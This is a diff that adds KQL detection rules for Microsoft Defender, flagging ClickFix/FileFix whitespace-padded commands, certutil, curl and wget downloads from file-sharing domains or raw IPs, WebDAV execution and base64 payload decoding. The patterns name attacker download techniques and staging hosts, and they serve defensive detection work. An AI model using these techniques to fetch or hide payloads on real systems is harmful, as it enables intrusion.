+++ b/KQL/rules/windows/process_creation/suspicious_explorer_process_with_whitespace_padding_clickfix_filefix.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Explorer Process with Whitespace Padding - ClickFix/FileFix
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-11-04
+// Level: high
+// Description: Detects process creation with suspicious whitespace padding followed by a '#' character, which may indicate ClickFix or FileFix techniques used to conceal malicious commands from visual inspection.
+// ClickFix and FileFix are social engineering attack techniques where adversaries distribute phishing documents or malicious links that deceive users into opening the Windows Run dialog box or File Explorer search bar.
+// The victims are then instructed to paste commands from their clipboard, which contain extensive whitespace padding using various Unicode space characters to push the actual malicious command far to the right, effectively hiding it from immediate view.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1204.004, attack.defense-evasion, attack.t1027.010
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "#" and InitiatingProcessFolderPath endswith "\\explorer.exe") and (ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains "            ")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_extrac32_alternate_data_stream_execution.kql b/KQL/rules/windows/process_creation/suspicious_extrac32_alternate_data_stream_execution.kql
new file mode 100644
index 00000000..a5da7450
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_extrac32_alternate_data_stream_execution.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Extrac32 Alternate Data Stream Execution
+// Author: frack113
+// Date: 2021-11-26
+// Level: medium
+// Description: Extract data from cab file and hide it in an alternate data stream
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1564.004
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "extrac32.exe" and ProcessCommandLine contains ".cab") and ProcessCommandLine matches regex ":[^\\\\]"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_extrac32_execution.kql b/KQL/rules/windows/process_creation/suspicious_extrac32_execution.kql
new file mode 100644
index 00000000..4c2c37b6
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_extrac32_execution.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Extrac32 Execution
+// Author: frack113
+// Date: 2021-11-26
+// Level: medium
+// Description: Download or Copy file with Extrac32
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105
+
+DeviceProcessEvents
+| where ProcessCommandLine contains ".cab" and (ProcessCommandLine contains "extrac32.exe" or FolderPath endswith "\\extrac32.exe" or ProcessVersionInfoOriginalFileName =~ "extrac32.exe") and (ProcessCommandLine contains "/C" or ProcessCommandLine contains "/Y" or ProcessCommandLine contains " \\\\")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_file_characteristics_due_to_missing_fields.kql b/KQL/rules/windows/process_creation/suspicious_file_characteristics_due_to_missing_fields.kql
new file mode 100644
index 00000000..882207d0
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_file_characteristics_due_to_missing_fields.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious File Characteristics Due to Missing Fields
+// Author: Markus Neis, Sander Wiebing
+// Date: 2018-11-22
+// Level: medium
+// Description: Detects Executables in the Downloads folder without FileVersion,Description,Product,Company likely created with py2exe
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.006
+
+DeviceProcessEvents
+| where ((ProcessVersionInfoFileDescription =~ "?" and ProcessVersionInfoProductVersion =~ "?") or (ProcessVersionInfoFileDescription =~ "?" and ProcessVersionInfoProductName =~ "?") or (ProcessVersionInfoCompanyName =~ "?" and ProcessVersionInfoFileDescription =~ "?")) and FolderPath contains "\\Downloads\\"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_file_download_from_file_sharing_domain_via_curl_exe.kql b/KQL/rules/windows/process_creation/suspicious_file_download_from_file_sharing_domain_via_curl_exe.kql
new file mode 100644
index 00000000..f07667f3
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_file_download_from_file_sharing_domain_via_curl_exe.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious File Download From File Sharing Domain Via Curl.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-05
+// Level: high
+// Description: Detects potentially suspicious file download from file sharing domains using curl.exe
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
+| where (ProcessCommandLine endswith ".ps1" or ProcessCommandLine endswith ".ps1'" or ProcessCommandLine endswith ".ps1\"" or ProcessCommandLine endswith ".dat" or ProcessCommandLine endswith ".dat'" or ProcessCommandLine endswith ".dat\"" or ProcessCommandLine endswith ".msi" or ProcessCommandLine endswith ".msi'" or ProcessCommandLine endswith ".msi\"" or ProcessCommandLine endswith ".bat" or ProcessCommandLine endswith ".bat'" or ProcessCommandLine endswith ".bat\"" or ProcessCommandLine endswith ".exe" or ProcessCommandLine endswith ".exe'" or ProcessCommandLine endswith ".exe\"" or ProcessCommandLine endswith ".vbs" or ProcessCommandLine endswith ".vbs'" or ProcessCommandLine endswith ".vbs\"" or ProcessCommandLine endswith ".vbe" or ProcessCommandLine endswith ".vbe'" or ProcessCommandLine endswith ".vbe\"" or ProcessCommandLine endswith ".hta" or ProcessCommandLine endswith ".hta'" or ProcessCommandLine endswith ".hta\"" or ProcessCommandLine endswith ".dll" or ProcessCommandLine endswith ".dll'" or ProcessCommandLine endswith ".dll\"" or ProcessCommandLine endswith ".psm1" or ProcessCommandLine endswith ".psm1'" or ProcessCommandLine endswith ".psm1\"") and (ProcessCommandLine contains " -O" or ProcessCommandLine contains "--remote-name" or ProcessCommandLine contains "--output") and ProcessCommandLine contains "http" and (FolderPath endswith "\\curl.exe" or ProcessVersionInfoOriginalFileName =~ "curl.exe") and (ProcessCommandLine contains ".githubusercontent.com" or ProcessCommandLine contains "anonfiles.com" or ProcessCommandLine contains "cdn.discordapp.com" or ProcessCommandLine contains "ddns.net" or ProcessCommandLine contains "dl.dropboxusercontent.com" or ProcessCommandLine contains "ghostbin.co" or ProcessCommandLine contains "github.com" or ProcessCommandLine contains "glitch.me" or ProcessCommandLine contains "gofile.io" or ProcessCommandLine contains "hastebin.com" or ProcessCommandLine contains "mediafire.com" or ProcessCommandLine contains "mega.nz" or ProcessCommandLine contains "onrender.com" or ProcessCommandLine contains "pages.dev" or ProcessCommandLine contains "paste.ee" or ProcessCommandLine contains "pastebin.com" or ProcessCommandLine contains "pastebin.pl" or ProcessCommandLine contains "pastetext.net" or ProcessCommandLine contains "pixeldrain.com" or ProcessCommandLine contains "privatlab.com" or ProcessCommandLine contains "privatlab.net" or ProcessCommandLine contains "send.exploit.in" or ProcessCommandLine contains "sendspace.com" or ProcessCommandLine contains "storage.googleapis.com" or ProcessCommandLine contains "storjshare.io" or ProcessCommandLine contains "supabase.co" or ProcessCommandLine contains "temp.sh" or ProcessCommandLine contains "transfer.sh" or ProcessCommandLine contains "trycloudflare.com" or ProcessCommandLine contains "ufile.io" or ProcessCommandLine contains "w3spaces.com" or ProcessCommandLine contains "workers.dev")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_file_download_from_file_sharing_domain_via_wget_exe.kql b/KQL/rules/windows/process_creation/suspicious_file_download_from_file_sharing_domain_via_wget_exe.kql
new file mode 100644
index 00000000..74c057a6
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_file_download_from_file_sharing_domain_via_wget_exe.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious File Download From File Sharing Domain Via Wget.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-05
+// Level: high
+// Description: Detects potentially suspicious file downloads from file sharing domains using wget.exe
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
+| where (ProcessCommandLine endswith ".ps1" or ProcessCommandLine endswith ".ps1'" or ProcessCommandLine endswith ".ps1\"" or ProcessCommandLine endswith ".dat" or ProcessCommandLine endswith ".dat'" or ProcessCommandLine endswith ".dat\"" or ProcessCommandLine endswith ".msi" or ProcessCommandLine endswith ".msi'" or ProcessCommandLine endswith ".msi\"" or ProcessCommandLine endswith ".bat" or ProcessCommandLine endswith ".bat'" or ProcessCommandLine endswith ".bat\"" or ProcessCommandLine endswith ".exe" or ProcessCommandLine endswith ".exe'" or ProcessCommandLine endswith ".exe\"" or ProcessCommandLine endswith ".vbs" or ProcessCommandLine endswith ".vbs'" or ProcessCommandLine endswith ".vbs\"" or ProcessCommandLine endswith ".vbe" or ProcessCommandLine endswith ".vbe'" or ProcessCommandLine endswith ".vbe\"" or ProcessCommandLine endswith ".hta" or ProcessCommandLine endswith ".hta'" or ProcessCommandLine endswith ".hta\"" or ProcessCommandLine endswith ".dll" or ProcessCommandLine endswith ".dll'" or ProcessCommandLine endswith ".dll\"" or ProcessCommandLine endswith ".psm1" or ProcessCommandLine endswith ".psm1'" or ProcessCommandLine endswith ".psm1\"") and (ProcessCommandLine matches regex "\\s-O\\s" or ProcessCommandLine contains "--output-document") and ProcessCommandLine contains "http" and (FolderPath endswith "\\wget.exe" or ProcessVersionInfoOriginalFileName =~ "wget.exe") and (ProcessCommandLine contains ".githubusercontent.com" or ProcessCommandLine contains "anonfiles.com" or ProcessCommandLine contains "cdn.discordapp.com" or ProcessCommandLine contains "ddns.net" or ProcessCommandLine contains "dl.dropboxusercontent.com" or ProcessCommandLine contains "ghostbin.co" or ProcessCommandLine contains "github.com" or ProcessCommandLine contains "glitch.me" or ProcessCommandLine contains "gofile.io" or ProcessCommandLine contains "hastebin.com" or ProcessCommandLine contains "mediafire.com" or ProcessCommandLine contains "mega.nz" or ProcessCommandLine contains "onrender.com" or ProcessCommandLine contains "pages.dev" or ProcessCommandLine contains "paste.ee" or ProcessCommandLine contains "pastebin.com" or ProcessCommandLine contains "pastebin.pl" or ProcessCommandLine contains "pastetext.net" or ProcessCommandLine contains "pixeldrain.com" or ProcessCommandLine contains "privatlab.com" or ProcessCommandLine contains "privatlab.net" or ProcessCommandLine contains "send.exploit.in" or ProcessCommandLine contains "sendspace.com" or ProcessCommandLine contains "storage.googleapis.com" or ProcessCommandLine contains "storjshare.io" or ProcessCommandLine contains "supabase.co" or ProcessCommandLine contains "temp.sh" or ProcessCommandLine contains "transfer.sh" or ProcessCommandLine contains "trycloudflare.com" or ProcessCommandLine contains "ufile.io" or ProcessCommandLine contains "w3spaces.com" or ProcessCommandLine contains "workers.dev")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_file_download_from_ip_via_curl_exe.kql b/KQL/rules/windows/process_creation/suspicious_file_download_from_ip_via_curl_exe.kql
new file mode 100644
index 00000000..02a5cd5d
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_file_download_from_ip_via_curl_exe.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious File Download From IP Via Curl.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-07-27
+// Level: high
+// Description: Detects potentially suspicious file downloads directly from IP addresses using curl.exe
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
+| where (ProcessCommandLine endswith ".bat" or ProcessCommandLine endswith ".bat\"" or ProcessCommandLine endswith ".dat" or ProcessCommandLine endswith ".dat\"" or ProcessCommandLine endswith ".dll" or ProcessCommandLine endswith ".dll\"" or ProcessCommandLine endswith ".exe" or ProcessCommandLine endswith ".exe\"" or ProcessCommandLine endswith ".gif" or ProcessCommandLine endswith ".gif\"" or ProcessCommandLine endswith ".hta" or ProcessCommandLine endswith ".hta\"" or ProcessCommandLine endswith ".jpeg" or ProcessCommandLine endswith ".jpeg\"" or ProcessCommandLine endswith ".log" or ProcessCommandLine endswith ".log\"" or ProcessCommandLine endswith ".msi" or ProcessCommandLine endswith ".msi\"" or ProcessCommandLine endswith ".png" or ProcessCommandLine endswith ".png\"" or ProcessCommandLine endswith ".ps1" or ProcessCommandLine endswith ".ps1\"" or ProcessCommandLine endswith ".psm1" or ProcessCommandLine endswith ".psm1\"" or ProcessCommandLine endswith ".vbe" or ProcessCommandLine endswith ".vbe\"" or ProcessCommandLine endswith ".vbs" or ProcessCommandLine endswith ".vbs\"" or ProcessCommandLine endswith ".bat'" or ProcessCommandLine endswith ".dat'" or ProcessCommandLine endswith ".dll'" or ProcessCommandLine endswith ".exe'" or ProcessCommandLine endswith ".gif'" or ProcessCommandLine endswith ".hta'" or ProcessCommandLine endswith ".jpeg'" or ProcessCommandLine endswith ".log'" or ProcessCommandLine endswith ".msi'" or ProcessCommandLine endswith ".png'" or ProcessCommandLine endswith ".ps1'" or ProcessCommandLine endswith ".psm1'" or ProcessCommandLine endswith ".vbe'" or ProcessCommandLine endswith ".vbs'") and (ProcessCommandLine contains " -O" or ProcessCommandLine contains "--remote-name" or ProcessCommandLine contains "--output") and ProcessCommandLine contains "http" and (FolderPath endswith "\\curl.exe" or ProcessVersionInfoOriginalFileName =~ "curl.exe") and ProcessCommandLine matches regex "://[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_file_download_from_ip_via_wget_exe.kql b/KQL/rules/windows/process_creation/suspicious_file_download_from_ip_via_wget_exe.kql
new file mode 100644
index 00000000..5680ffe4
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_file_download_from_ip_via_wget_exe.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious File Download From IP Via Wget.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-07-27
+// Level: high
+// Description: Detects potentially suspicious file downloads directly from IP addresses using Wget.exe
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
+| where (ProcessCommandLine endswith ".ps1" or ProcessCommandLine endswith ".ps1'" or ProcessCommandLine endswith ".ps1\"" or ProcessCommandLine endswith ".dat" or ProcessCommandLine endswith ".dat'" or ProcessCommandLine endswith ".dat\"" or ProcessCommandLine endswith ".msi" or ProcessCommandLine endswith ".msi'" or ProcessCommandLine endswith ".msi\"" or ProcessCommandLine endswith ".bat" or ProcessCommandLine endswith ".bat'" or ProcessCommandLine endswith ".bat\"" or ProcessCommandLine endswith ".exe" or ProcessCommandLine endswith ".exe'" or ProcessCommandLine endswith ".exe\"" or ProcessCommandLine endswith ".vbs" or ProcessCommandLine endswith ".vbs'" or ProcessCommandLine endswith ".vbs\"" or ProcessCommandLine endswith ".vbe" or ProcessCommandLine endswith ".vbe'" or ProcessCommandLine endswith ".vbe\"" or ProcessCommandLine endswith ".hta" or ProcessCommandLine endswith ".hta'" or ProcessCommandLine endswith ".hta\"" or ProcessCommandLine endswith ".dll" or ProcessCommandLine endswith ".dll'" or ProcessCommandLine endswith ".dll\"" or ProcessCommandLine endswith ".psm1" or ProcessCommandLine endswith ".psm1'" or ProcessCommandLine endswith ".psm1\"") and (ProcessCommandLine matches regex "\\s-O\\s" or ProcessCommandLine contains "--output-document") and ProcessCommandLine contains "http" and (FolderPath endswith "\\wget.exe" or ProcessVersionInfoOriginalFileName =~ "wget.exe") and ProcessCommandLine matches regex "://[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_file_download_from_ip_via_wget_exe_paths.kql b/KQL/rules/windows/process_creation/suspicious_file_download_from_ip_via_wget_exe_paths.kql
new file mode 100644
index 00000000..c3745c13
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_file_download_from_ip_via_wget_exe_paths.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious File Download From IP Via Wget.EXE - Paths
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-02-23
+// Level: high
+// Description: Detects potentially suspicious file downloads directly from IP addresses and stored in suspicious locations using Wget.exe
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
+| where (ProcessCommandLine matches regex "\\s-O\\s" or ProcessCommandLine contains "--output-document") and ProcessCommandLine contains "http" and (FolderPath endswith "\\wget.exe" or ProcessVersionInfoOriginalFileName =~ "wget.exe") and ProcessCommandLine matches regex "://[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}" and ((ProcessCommandLine contains ":\\PerfLogs\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\Help\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains "\\Temporary Internet") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Favorites\\") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Favourites\\") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Contacts\\") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Pictures\\"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_file_downloaded_from_direct_ip_via_certutil_exe.kql b/KQL/rules/windows/process_creation/suspicious_file_downloaded_from_direct_ip_via_certutil_exe.kql
new file mode 100644
index 00000000..b4f0f0ac
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_file_downloaded_from_direct_ip_via_certutil_exe.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious File Downloaded From Direct IP Via Certutil.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-02-15
+// Level: high
+// Description: Detects the execution of certutil with certain flags that allow the utility to download files from direct IPs.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027, attack.command-and-control, attack.t1105
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "urlcache " or ProcessCommandLine contains "verifyctl " or ProcessCommandLine contains "URL ") and (ProcessCommandLine contains "://1" or ProcessCommandLine contains "://2" or ProcessCommandLine contains "://3" or ProcessCommandLine contains "://4" or ProcessCommandLine contains "://5" or ProcessCommandLine contains "://6" or ProcessCommandLine contains "://7" or ProcessCommandLine contains "://8" or ProcessCommandLine contains "://9") and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe")) and (not(ProcessCommandLine contains "://7-"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_file_downloaded_from_file_sharing_website_via_certutil_exe.kql b/KQL/rules/windows/process_creation/suspicious_file_downloaded_from_file_sharing_website_via_certutil_exe.kql
new file mode 100644
index 00000000..37babf2c
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_file_downloaded_from_file_sharing_website_via_certutil_exe.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-02-15
+// Level: high
+// Description: Detects the execution of certutil with certain flags that allow the utility to download files from file-sharing websites.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027, attack.command-and-control, attack.t1105
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "urlcache " or ProcessCommandLine contains "verifyctl " or ProcessCommandLine contains "URL ") and (ProcessCommandLine contains ".githubusercontent.com" or ProcessCommandLine contains "anonfiles.com" or ProcessCommandLine contains "cdn.discordapp.com" or ProcessCommandLine contains "ddns.net" or ProcessCommandLine contains "dl.dropboxusercontent.com" or ProcessCommandLine contains "ghostbin.co" or ProcessCommandLine contains "github.com" or ProcessCommandLine contains "glitch.me" or ProcessCommandLine contains "gofile.io" or ProcessCommandLine contains "hastebin.com" or ProcessCommandLine contains "mediafire.com" or ProcessCommandLine contains "mega.nz" or ProcessCommandLine contains "onrender.com" or ProcessCommandLine contains "pages.dev" or ProcessCommandLine contains "paste.ee" or ProcessCommandLine contains "pastebin.com" or ProcessCommandLine contains "pastebin.pl" or ProcessCommandLine contains "pastetext.net" or ProcessCommandLine contains "privatlab.com" or ProcessCommandLine contains "privatlab.net" or ProcessCommandLine contains "send.exploit.in" or ProcessCommandLine contains "sendspace.com" or ProcessCommandLine contains "storage.googleapis.com" or ProcessCommandLine contains "storjshare.io" or ProcessCommandLine contains "supabase.co" or ProcessCommandLine contains "temp.sh" or ProcessCommandLine contains "transfer.sh" or ProcessCommandLine contains "trycloudflare.com" or ProcessCommandLine contains "ufile.io" or ProcessCommandLine contains "w3spaces.com" or ProcessCommandLine contains "workers.dev") and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_file_encoded_to_base64_via_certutil_exe.kql b/KQL/rules/windows/process_creation/suspicious_file_encoded_to_base64_via_certutil_exe.kql
new file mode 100644
index 00000000..e3b0c584
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_file_encoded_to_base64_via_certutil_exe.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious File Encoded To Base64 Via Certutil.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-15
+// Level: high
+// Description: Detects the execution of certutil with the "encode" flag to encode a file to base64 where the extensions of the file is suspicious
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-encode" or ProcessCommandLine contains "/encode" or ProcessCommandLine contains "–encode" or ProcessCommandLine contains "—encode" or ProcessCommandLine contains "―encode") and (ProcessCommandLine contains ".acl" or ProcessCommandLine contains ".bat" or ProcessCommandLine contains ".doc" or ProcessCommandLine contains ".gif" or ProcessCommandLine contains ".jpeg" or ProcessCommandLine contains ".jpg" or ProcessCommandLine contains ".mp3" or ProcessCommandLine contains ".pdf" or ProcessCommandLine contains ".png" or ProcessCommandLine contains ".ppt" or ProcessCommandLine contains ".tmp" or ProcessCommandLine contains ".xls" or ProcessCommandLine contains ".xml") and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_file_execution_from_internet_hosted_webdav_share.kql b/KQL/rules/windows/process_creation/suspicious_file_execution_from_internet_hosted_webdav_share.kql
new file mode 100644
index 00000000..4847028b
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_file_execution_from_internet_hosted_webdav_share.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious File Execution From Internet Hosted WebDav Share
+// Author: pH-T (Nextron Systems)
+// Date: 2022-09-01
+// Level: high
+// Description: Detects the execution of the "net use" command to mount a WebDAV server and then immediately execute some content in it. As seen being used in malicious LNK files
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " net use http" and ProcessCommandLine contains "& start /b " and ProcessCommandLine contains "\\DavWWWRoot\\") and (ProcessCommandLine contains ".exe " or ProcessCommandLine contains ".dll " or ProcessCommandLine contains ".bat " or ProcessCommandLine contains ".vbs " or ProcessCommandLine contains ".ps1 ") and (FolderPath contains "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.EXE")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_filefix_execution_pattern.kql b/KQL/rules/windows/process_creation/suspicious_filefix_execution_pattern.kql
new file mode 100644
index 00000000..565e4e2b
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_filefix_execution_pattern.kql
@@ -0,0 +1,15 @@
+// Title: Suspicious FileFix Execution Pattern
+// Author: 0xFustang, Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-11-24
+// Level: high
+// Description: Detects suspicious FileFix execution patterns where users are tricked into running malicious commands through browser file upload dialog manipulation.
+// This attack typically begins when users visit malicious websites impersonating legitimate services or news platforms,
+// which may display fake CAPTCHA challenges or direct instructions to open file explorer and paste clipboard content.
+// The clipboard content usually contains commands that download and execute malware, such as information stealing tools.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1204.004
+// False Positives:
+//   - Legitimate use of PowerShell or other utilities launched from browser extensions or automation tools
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "#" and (InitiatingProcessFolderPath endswith "\\brave.exe" or InitiatingProcessFolderPath endswith "\\chrome.exe" or InitiatingProcessFolderPath endswith "\\firefox.exe" or InitiatingProcessFolderPath endswith "\\msedge.exe")) and ((ProcessCommandLine contains "account" or ProcessCommandLine contains "anti-bot" or ProcessCommandLine contains "botcheck" or ProcessCommandLine contains "captcha" or ProcessCommandLine contains "challenge" or ProcessCommandLine contains "confirmation" or ProcessCommandLine contains "fraud" or ProcessCommandLine contains "human" or ProcessCommandLine contains "identification" or ProcessCommandLine contains "identificator" or ProcessCommandLine contains "identity" or ProcessCommandLine contains "robot" or ProcessCommandLine contains "validation" or ProcessCommandLine contains "verification" or ProcessCommandLine contains "verify") or (ProcessCommandLine contains "%comspec%" or ProcessCommandLine contains "bitsadmin" or ProcessCommandLine contains "certutil" or ProcessCommandLine contains "cmd" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "curl" or ProcessCommandLine contains "finger" or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "powershell" or ProcessCommandLine contains "pwsh" or ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "schtasks" or ProcessCommandLine contains "wget" or ProcessCommandLine contains "wscript"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_frombase64string_usage_on_gzip_archive_process_creation.kql b/KQL/rules/windows/process_creation/suspicious_frombase64string_usage_on_gzip_archive_process_creation.kql
new file mode 100644
index 00000000..5f086383
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_frombase64string_usage_on_gzip_archive_process_creation.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious FromBase64String Usage On Gzip Archive - Process Creation
+// Author: frack113
+// Date: 2022-12-23
+// Level: medium
+// Description: Detects attempts of decoding a base64 Gzip archive via PowerShell. This technique is often used as a method to load malicious content into memory afterward.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1132.001
+// False Positives:
+//   - Legitimate administrative script
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "FromBase64String" and ProcessCommandLine contains "MemoryStream" and ProcessCommandLine contains "H4sI"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_git_clone.kql b/KQL/rules/windows/process_creation/suspicious_git_clone.kql
new file mode 100644
index 00000000..5eaf3723
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_git_clone.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Git Clone
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-03
+// Level: medium
+// Description: Detects execution of "git" in order to clone a remote repository that contain suspicious keywords which might be suspicious
+// MITRE Tactic: Reconnaissance
+// Tags: attack.reconnaissance, attack.t1593.003
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " clone " or ProcessCommandLine contains "git-remote-https ") and ((FolderPath endswith "\\git.exe" or FolderPath endswith "\\git-remote-https.exe") or ProcessVersionInfoOriginalFileName =~ "git.exe") and (ProcessCommandLine contains "exploit" or ProcessCommandLine contains "Vulns" or ProcessCommandLine contains "vulnerability" or ProcessCommandLine contains "RemoteCodeExecution" or ProcessCommandLine contains "Invoke-" or ProcessCommandLine contains "CVE-" or ProcessCommandLine contains "poc-" or ProcessCommandLine contains "ProofOfConcept" or ProcessCommandLine contains "proxyshell" or ProcessCommandLine contains "log4shell" or ProcessCommandLine contains "eternalblue" or ProcessCommandLine contains "eternal-blue" or ProcessCommandLine contains "MS17-")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_greedy_compression_using_rar_exe.kql b/KQL/rules/windows/process_creation/suspicious_greedy_compression_using_rar_exe.kql
new file mode 100644
index 00000000..4731076f
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_greedy_compression_using_rar_exe.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Greedy Compression Using Rar.EXE
+// Author: X__Junior (Nextron Systems), Florian Roth (Nextron Systems)
+// Date: 2022-12-15
+// Level: high
+// Description: Detects RAR usage that creates an archive from a suspicious folder, either a system folder or one of the folders often used by attackers for staging purposes
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\rar.exe" or ProcessVersionInfoFileDescription =~ "Command line RAR") or (ProcessCommandLine contains ".exe a " or ProcessCommandLine contains " a -m")) and ((ProcessCommandLine contains " -hp" and ProcessCommandLine contains " -r ") and ((ProcessCommandLine contains " " and ProcessCommandLine contains ":*.") or (ProcessCommandLine contains " " and ProcessCommandLine contains ":\*.") or (ProcessCommandLine contains " " and ProcessCommandLine contains ":\\$Recycle.bin\\") or (ProcessCommandLine contains " " and ProcessCommandLine contains ":\\PerfLogs\\") or (ProcessCommandLine contains " " and ProcessCommandLine contains ":\\Temp") or (ProcessCommandLine contains " " and ProcessCommandLine contains ":\\Users\\Public\\") or (ProcessCommandLine contains " " and ProcessCommandLine contains ":\\Windows\\") or ProcessCommandLine contains " %public%"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_group_and_account_reconnaissance_activity_using_net_exe.kql b/KQL/rules/windows/process_creation/suspicious_group_and_account_reconnaissance_activity_using_net_exe.kql
new file mode 100644
index 00000000..b3be07ec
